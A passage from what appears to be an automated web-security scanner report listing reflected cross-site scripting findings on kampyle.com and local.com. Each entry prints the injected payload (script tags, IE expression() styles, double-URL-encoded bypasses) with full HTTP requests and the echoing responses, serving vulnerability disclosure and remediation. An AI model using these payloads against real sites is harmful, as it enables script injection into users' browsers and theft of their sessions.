Set-Cookie: FF_referrer_url=aHR0cDovL3d3dy5rYW1weWxlLmNvbS9mZWVkYmFja19mb3JtL2ZmLWZlZWRiYWNrLWZvcm0ucGhwP3NpdGVfY29kZT02OTQxMTUyJmFtcDtsYW5nPWVuJmFtcDtmb3JtX2lkPTU2MDE1JnRpbWVfb25fc2l0ZT0xMCZzdGF0cz1rX2J1dHRvbl9qc19yZXZpc2lvbiUzRDE1NjQzJnVybD1odHRwJTNBJTJGJTJGd3d3LmxvY2FsLmNvbSUyRiZ1dG16PTE3NzA2MjIwMC4xMzE2Mjk1NDk5LjEuMS51dG1jc3IlM0RmYWtlcmVmZXJyZXJkb21pbmF0b3IuY29tJTdDdXRtY2NuJTNEKHJlZmVycmFsKSU3Q3V0bWNtZCUzRHJlZmVycmFsJTdDdXRtY2N0JTNEJTJGcmVmZXJyZXJQYXRoTmFtZSZ1dG1hPTE3NzA2MjIwMC42MDUyMjg0OTkuMTMxNjI5NTQ5OS4xMzE2Mjk1NDk5LjEzMTYyOTU0OTkuMTRmZGFhIj48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ%2BMjE5MjkyNTNkNjUmdXRtdj1udWxs; expires=Sat, 17-Sep-2011 18:01:05 GMT; path=/
Set-Cookie: FF_caller_url=aHR0cDovL3d3dy5sb2NhbC5jb20v; expires=Sat, 17-Sep-2011 18:01:05 GMT; path=/
Vary: Accept-Encoding
Content-Length: 17967
Content-Type: text/html; charset=UTF-8

<?xml version="1.0"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<
...[SNIP]...
%2F&utmz=177062200.1316295499.1.1.utmcsr%3Dfakereferrerdominator.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName&utma=177062200.605228499.1316295499.1316295499.1316295499.14fdaa"><script>alert(1)</script>21929253d65&utmv=null');            }">
...[SNIP]...
4.352. http://www.kampyle.com/feedback_form/ff-feedback-form.php [utmv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kampyle.com
Path:   /feedback_form/ff-feedback-form.php

Issue detail

The value of the utmv request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e119"><script>alert(1)</script>5e6c26500c9 was submitted in the utmv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feedback_form/ff-feedback-form.php?site_code=6941152&amp;lang=en&amp;form_id=56015&time_on_site=10&stats=k_button_js_revision%3D15643&url=http%3A%2F%2Fwww.local.com%2F&utmz=177062200.1316295499.1.1.utmcsr%3Dfakereferrerdominator.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName&utma=177062200.605228499.1316295499.1316295499.1316295499.1&utmv=null1e119"><script>alert(1)</script>5e6c26500c9 HTTP/1.1
Host: www.kampyle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.local.com/

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:01:20 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: FF_referrer_url=aHR0cDovL3d3dy5rYW1weWxlLmNvbS9mZWVkYmFja19mb3JtL2ZmLWZlZWRiYWNrLWZvcm0ucGhwP3NpdGVfY29kZT02OTQxMTUyJmFtcDtsYW5nPWVuJmFtcDtmb3JtX2lkPTU2MDE1JnRpbWVfb25fc2l0ZT0xMCZzdGF0cz1rX2J1dHRvbl9qc19yZXZpc2lvbiUzRDE1NjQzJnVybD1odHRwJTNBJTJGJTJGd3d3LmxvY2FsLmNvbSUyRiZ1dG16PTE3NzA2MjIwMC4xMzE2Mjk1NDk5LjEuMS51dG1jc3IlM0RmYWtlcmVmZXJyZXJkb21pbmF0b3IuY29tJTdDdXRtY2NuJTNEKHJlZmVycmFsKSU3Q3V0bWNtZCUzRHJlZmVycmFsJTdDdXRtY2N0JTNEJTJGcmVmZXJyZXJQYXRoTmFtZSZ1dG1hPTE3NzA2MjIwMC42MDUyMjg0OTkuMTMxNjI5NTQ5OS4xMzE2Mjk1NDk5LjEzMTYyOTU0OTkuMSZ1dG12PW51bGwxZTExOSI%2BPHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0PjVlNmMyNjUwMGM5; expires=Sat, 17-Sep-2011 18:01:20 GMT; path=/
Set-Cookie: FF_caller_url=aHR0cDovL3d3dy5sb2NhbC5jb20v; expires=Sat, 17-Sep-2011 18:01:20 GMT; path=/
Vary: Accept-Encoding
Content-Length: 17967
Content-Type: text/html; charset=UTF-8

<?xml version="1.0"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<
...[SNIP]...
77062200.1316295499.1.1.utmcsr%3Dfakereferrerdominator.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName&utma=177062200.605228499.1316295499.1316295499.1316295499.1&utmv=null1e119"><script>alert(1)</script>5e6c26500c9');            }">
...[SNIP]...
4.353. http://www.kampyle.com/feedback_form/ff-feedback-form.php [utmz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kampyle.com
Path:   /feedback_form/ff-feedback-form.php

Issue detail

The value of the utmz request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69e61"><script>alert(1)</script>98142428256 was submitted in the utmz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feedback_form/ff-feedback-form.php?site_code=6941152&amp;lang=en&amp;form_id=56015&time_on_site=10&stats=k_button_js_revision%3D15643&url=http%3A%2F%2Fwww.local.com%2F&utmz=177062200.1316295499.1.1.utmcsr%3Dfakereferrerdominator.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName69e61"><script>alert(1)</script>98142428256&utma=177062200.605228499.1316295499.1316295499.1316295499.1&utmv=null HTTP/1.1
Host: www.kampyle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.local.com/

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:00:49 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: FF_referrer_url=aHR0cDovL3d3dy5rYW1weWxlLmNvbS9mZWVkYmFja19mb3JtL2ZmLWZlZWRiYWNrLWZvcm0ucGhwP3NpdGVfY29kZT02OTQxMTUyJmFtcDtsYW5nPWVuJmFtcDtmb3JtX2lkPTU2MDE1JnRpbWVfb25fc2l0ZT0xMCZzdGF0cz1rX2J1dHRvbl9qc19yZXZpc2lvbiUzRDE1NjQzJnVybD1odHRwJTNBJTJGJTJGd3d3LmxvY2FsLmNvbSUyRiZ1dG16PTE3NzA2MjIwMC4xMzE2Mjk1NDk5LjEuMS51dG1jc3IlM0RmYWtlcmVmZXJyZXJkb21pbmF0b3IuY29tJTdDdXRtY2NuJTNEKHJlZmVycmFsKSU3Q3V0bWNtZCUzRHJlZmVycmFsJTdDdXRtY2N0JTNEJTJGcmVmZXJyZXJQYXRoTmFtZTY5ZTYxIj48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ%2BOTgxNDI0MjgyNTYmdXRtYT0xNzcwNjIyMDAuNjA1MjI4NDk5LjEzMTYyOTU0OTkuMTMxNjI5NTQ5OS4xMzE2Mjk1NDk5LjEmdXRtdj1udWxs; expires=Sat, 17-Sep-2011 18:00:49 GMT; path=/
Set-Cookie: FF_caller_url=aHR0cDovL3d3dy5sb2NhbC5jb20v; expires=Sat, 17-Sep-2011 18:00:49 GMT; path=/
Vary: Accept-Encoding
Content-Length: 17967
Content-Type: text/html; charset=UTF-8

<?xml version="1.0"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<
...[SNIP]...
=k_button_js_revision%3D15643&url=http%3A%2F%2Fwww.local.com%2F&utmz=177062200.1316295499.1.1.utmcsr%3Dfakereferrerdominator.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName69e61"><script>alert(1)</script>98142428256&utma=177062200.605228499.1316295499.1316295499.1316295499.1&utmv=null');            }">
...[SNIP]...
4.354. http://www.local.com/dart/ [css parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the css request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60959"style%3d"x%3aexpression(alert(1))"b3344b02b19 was submitted in the css parameter. This input was echoed as 60959"style="x:expression(alert(1))"b3344b02b19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /dart/?ag=True&css=sponsored-by60959"style%3d"x%3aexpression(alert(1))"b3344b02b19&p=locm.hp&sz=163x27&ord=1316294750105&l=Dallas%2c+TX&zip=75201&kw=org HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sid=44c9c39a-4272-427f-9062-ee5347fb6ff4; localcom=cid=710&loc=Dallas%2c+TX&zip=75201&kw=&uid=338bc794-e584-489b-ac20-1670e91abec0&expdate=634544402771604950

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 914
Date: Sat, 17 Sep 2011 16:29:27 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 914


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<body class="sponsored-by60959"style="x:expression(alert(1))"b3344b02b19">
...[SNIP]...
4.355. http://www.local.com/dart/ [kw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the kw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5a86"style%3d"x%3aexpression(alert(1))"05ca928cf38 was submitted in the kw parameter. This input was echoed as c5a86"style="x:expression(alert(1))"05ca928cf38 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /dart/?ag=True&css=sponsored-by&p=locm.hp&sz=163x27&ord=1316294750105&l=Dallas%2c+TX&zip=75201&kw=orgc5a86"style%3d"x%3aexpression(alert(1))"05ca928cf38 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sid=44c9c39a-4272-427f-9062-ee5347fb6ff4; localcom=cid=710&loc=Dallas%2c+TX&zip=75201&kw=&uid=338bc794-e584-489b-ac20-1670e91abec0&expdate=634544402771604950

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 1008
Date: Sat, 17 Sep 2011 16:31:23 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 1008


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.hp;dcopt=ist;kw=;pos=;tile=;city=dallas_tx_75201;sz=163x27;kw=orgc5a86"style="x:expression(alert(1))"05ca928cf38;ord=1316294750105?" target="_blank">
...[SNIP]...
4.356. http://www.local.com/dart/ [kw parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the kw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59d6b'%3b9a2b7f0411c was submitted in the kw parameter. This input was echoed as 59d6b';9a2b7f0411c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dart/?ag=True&css=sponsored-by&p=locm.hp&sz=163x27&ord=1316294750105&l=Dallas%2c+TX&zip=75201&kw=org59d6b'%3b9a2b7f0411c HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sid=44c9c39a-4272-427f-9062-ee5347fb6ff4; localcom=cid=710&loc=Dallas%2c+TX&zip=75201&kw=&uid=338bc794-e584-489b-ac20-1670e91abec0&expdate=634544402771604950

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 921
Date: Sat, 17 Sep 2011 16:31:24 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 921


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.hp;dcopt=ist;kw=;pos=;tile=;city=dallas_tx_75201;sz=163x27;kw=org59d6b';9a2b7f0411c;ord=1316294750105?" type="text/javascript">
...[SNIP]...
4.357. http://www.local.com/dart/ [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the l request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ab50%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e056c21c27d5 was submitted in the l parameter. This input was echoed as 5ab50"><script>alert(1)</script>056c21c27d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the l request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /dart/?ag=True&css=sponsored-by&p=locm.hp&sz=163x27&ord=1316294750105&l=Dallas%2c+TX5ab50%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e056c21c27d5&zip=75201&kw=org HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sid=44c9c39a-4272-427f-9062-ee5347fb6ff4; localcom=cid=710&loc=Dallas%2c+TX&zip=75201&kw=&uid=338bc794-e584-489b-ac20-1670e91abec0&expdate=634544402771604950

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 1014
Date: Sat, 17 Sep 2011 16:30:37 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 1014


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.hp;dcopt=ist;kw=;pos=;tile=;city=dallas_tx5ab50"><script>alert(1)</script>056c21c27d5_75201;sz=163x27;kw=org;ord=1316294750105?" target="_blank">
...[SNIP]...
4.358. http://www.local.com/dart/ [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b2ef'%3b09da16b88b3 was submitted in the l parameter. This input was echoed as 8b2ef';09da16b88b3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dart/?ag=True&css=sponsored-by&p=locm.hp&sz=163x27&ord=1316294750105&l=Dallas%2c+TX8b2ef'%3b09da16b88b3&zip=75201&kw=org HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sid=44c9c39a-4272-427f-9062-ee5347fb6ff4; localcom=cid=710&loc=Dallas%2c+TX&zip=75201&kw=&uid=338bc794-e584-489b-ac20-1670e91abec0&expdate=634544402771604950

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 921
Date: Sat, 17 Sep 2011 16:30:37 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 921


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.hp;dcopt=ist;kw=;pos=;tile=;city=dallas_tx8b2ef';09da16b88b3_75201;sz=163x27;kw=org;ord=1316294750105?" type="text/javascript">
...[SNIP]...
4.359. http://www.local.com/dart/ [ord parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the ord request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b968"style%3d"x%3aexpression(alert(1))"b52e88b06fa was submitted in the ord parameter. This input was echoed as 5b968"style="x:expression(alert(1))"b52e88b06fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /dart/?ag=True&css=sponsored-by&p=locm.hp&sz=163x27&ord=13162947501055b968"style%3d"x%3aexpression(alert(1))"b52e88b06fa&l=Dallas%2c+TX&zip=75201&kw=org HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sid=44c9c39a-4272-427f-9062-ee5347fb6ff4; localcom=cid=710&loc=Dallas%2c+TX&zip=75201&kw=&uid=338bc794-e584-489b-ac20-1670e91abec0&expdate=634544402771604950

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 1008
Date: Sat, 17 Sep 2011 16:30:18 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 1008


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.hp;dcopt=ist;kw=;pos=;tile=;city=dallas_tx_75201;sz=163x27;kw=org;ord=13162947501055b968"style="x:expression(alert(1))"b52e88b06fa?" target="_blank">
...[SNIP]...
4.360. http://www.local.com/dart/ [ord parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the ord request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbbf1'%3b55ba1020aa1 was submitted in the ord parameter. This input was echoed as cbbf1';55ba1020aa1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dart/?ag=True&css=sponsored-by&p=locm.hp&sz=163x27&ord=1316294750105cbbf1'%3b55ba1020aa1&l=Dallas%2c+TX&zip=75201&kw=org HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sid=44c9c39a-4272-427f-9062-ee5347fb6ff4; localcom=cid=710&loc=Dallas%2c+TX&zip=75201&kw=&uid=338bc794-e584-489b-ac20-1670e91abec0&expdate=634544402771604950

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 921
Date: Sat, 17 Sep 2011 16:30:19 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 921


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.hp;dcopt=ist;kw=;pos=;tile=;city=dallas_tx_75201;sz=163x27;kw=org;ord=1316294750105cbbf1';55ba1020aa1?" type="text/javascript">
...[SNIP]...
4.361. http://www.local.com/dart/ [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the p request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 646d0"style%3d"x%3aexpression(alert(1))"214e4cba569 was submitted in the p parameter. This input was echoed as 646d0"style="x:expression(alert(1))"214e4cba569 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /dart/?ag=True&css=sponsored-by&p=locm.hp646d0"style%3d"x%3aexpression(alert(1))"214e4cba569&sz=163x27&ord=1316294750105&l=Dallas%2c+TX&zip=75201&kw=org HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sid=44c9c39a-4272-427f-9062-ee5347fb6ff4; localcom=cid=710&loc=Dallas%2c+TX&zip=75201&kw=&uid=338bc794-e584-489b-ac20-1670e91abec0&expdate=634544402771604950

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 1008
Date: Sat, 17 Sep 2011 16:29:40 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 1008


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.hp646d0"style="x:expression(alert(1))"214e4cba569;dcopt=ist;kw=;pos=;tile=;city=dallas_tx_75201;sz=163x27;kw=org;ord=1316294750105?" target="_blank">
...[SNIP]...
4.362. http://www.local.com/dart/ [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da65d'%3b62c2a31a931 was submitted in the p parameter. This input was echoed as da65d';62c2a31a931 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dart/?ag=True&css=sponsored-by&p=locm.hpda65d'%3b62c2a31a931&sz=163x27&ord=1316294750105&l=Dallas%2c+TX&zip=75201&kw=org HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sid=44c9c39a-4272-427f-9062-ee5347fb6ff4; localcom=cid=710&loc=Dallas%2c+TX&zip=75201&kw=&uid=338bc794-e584-489b-ac20-1670e91abec0&expdate=634544402771604950

Response

